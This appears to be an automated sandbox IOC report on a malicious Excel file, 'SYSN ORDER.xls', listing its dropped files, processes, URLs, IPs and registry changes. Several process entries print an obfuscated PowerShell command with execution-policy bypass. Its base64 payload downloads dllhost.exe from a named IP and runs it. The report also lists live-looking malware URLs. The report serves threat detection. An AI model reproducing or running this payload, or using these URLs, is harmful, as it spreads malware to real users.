IOC Report
SYSN ORDER.xls

loading gif

Files

File Path
Type
Category
Malicious
SYSN ORDER.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 02:41:41 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbokkworkingforupdate[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\dllhost.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Desktop\SYSN ORDER.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:12:36 2024, Security: 1
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15C11140.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF73AEE2.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\2ufkmc2n.u5y.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\RES4348.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 08:12:29 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\RES866F.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 08:12:46 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\differences
data
dropped
C:\Users\user\AppData\Local\Temp\ibz3bu0a.pqq.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
dropped
C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\qdk1rybx.30f.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
dropped
C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\xe1pvlqt.go1.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF07397FB908C5B4FE.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DF2C958FD442F9D1AC.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFA455A9BB9C6A2709.TMP
data
dropped
C:\Users\user\Desktop\B8230000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:12:36 2024, Security: 1
dropped
C:\Users\user\Desktop\B8230000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
There are 21 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"
malicious
C:\Users\user\AppData\Roaming\dllhost.exe
"C:\Users\user\AppData\Roaming\dllhost.exe"
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Users\user\AppData\Roaming\dllhost.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
malicious
C:\Users\user\AppData\Roaming\dllhost.exe
"C:\Users\user\AppData\Roaming\dllhost.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Users\user\AppData\Roaming\dllhost.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP"
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta
172.245.123.6
malicious
http://172.245.123.6/770/dllhost.exe
172.245.123.6
malicious
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaA
unknown
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...EEBDD-A8
unknown
https://og1.in/cIP5a8
172.67.216.244
https://og1.in/
unknown
http://ocsp.entrust.net03
unknown
https://og1.in/cIP5a8O
unknown
https://og1.in/cIP5a8H
unknown
https://contoso.com/License
unknown
https://og1.in/cIP5a8K
unknown
http://172.245.123.6/C
unknown
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta0
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://reallyfreegeoip.org/xml/8.46.123.334
unknown
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta7
unknown
http://go.micros
unknown
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta4
unknown
https://og1.in/=#
unknown
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaet
unknown
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htahttp://172.245.123.6/xampp/crio/IEnetbo
unknown
http://checkip.dyndns.org/
193.122.130.0
http://172.245.123.6/
unknown
https://og1.in/cIP5a8m
unknown
http://checkip.dyndns.org/q
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://reallyfreegeoip.org
unknown
https://og1.in/cIP5a8&W
unknown
http://checkip.dyndns.com
unknown
http://ocsp.entrust.net0D
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://reallyfreegeoip.orgPLZ
unknown
https://reallyfreegeoip.org/xml/
unknown
https://og1.in/cIP5a8pdate.hta
unknown
http://nuget.org/NuGet.exe
unknown
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaC:
unknown
http://crl.entrust.net/server1.crl0
unknown
https://contoso.com/Icon
unknown
https://og1.in/cIP5a8$
unknown
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta...
unknown
http://checkip.dyndns.org
unknown
https://reallyfreegeoip.org/xml/8.46.123.33
188.114.96.3
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htas
unknown
http://crl.m
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://172.245.123.6/O
unknown
https://reallyfreegeoip.org/xml/8.46.123.33PLZ
unknown
http://172.245.123.6/770/dllhost.exes
unknown
http://172.245.123.6/770/dllhost.exep
unknown
http://172.245.123.6/770/dllhost.exes?e
unknown
https://reallyfreegeoip.org
unknown
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta8A
unknown
https://secure.comodo.com/CPS0
unknown
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaW
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://172.245.123.6/770/dllhost
unknown
There are 48 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.96.3
malicious
checkip.dyndns.org
unknown
malicious
og1.in
172.67.216.244
checkip.dyndns.com
193.122.130.0

IPs

IP
Domain
Country
Malicious
172.245.123.6
unknown
United States
malicious
188.114.96.3
reallyfreegeoip.org
European Union
malicious
132.226.8.169
unknown
United States
104.21.78.54
unknown
United States
188.114.97.3
unknown
European Union
193.122.6.168
unknown
United States
193.122.130.0
checkip.dyndns.com
United States
158.101.44.242
unknown
United States
172.67.216.244
og1.in
United States
132.226.247.73
unknown
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
&>/
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28E89
28E89
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
{$/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\32F2B
32F2B
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\331BA
331BA
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33997
33997
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\331BA
331BA
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
ConsoleTracingMask
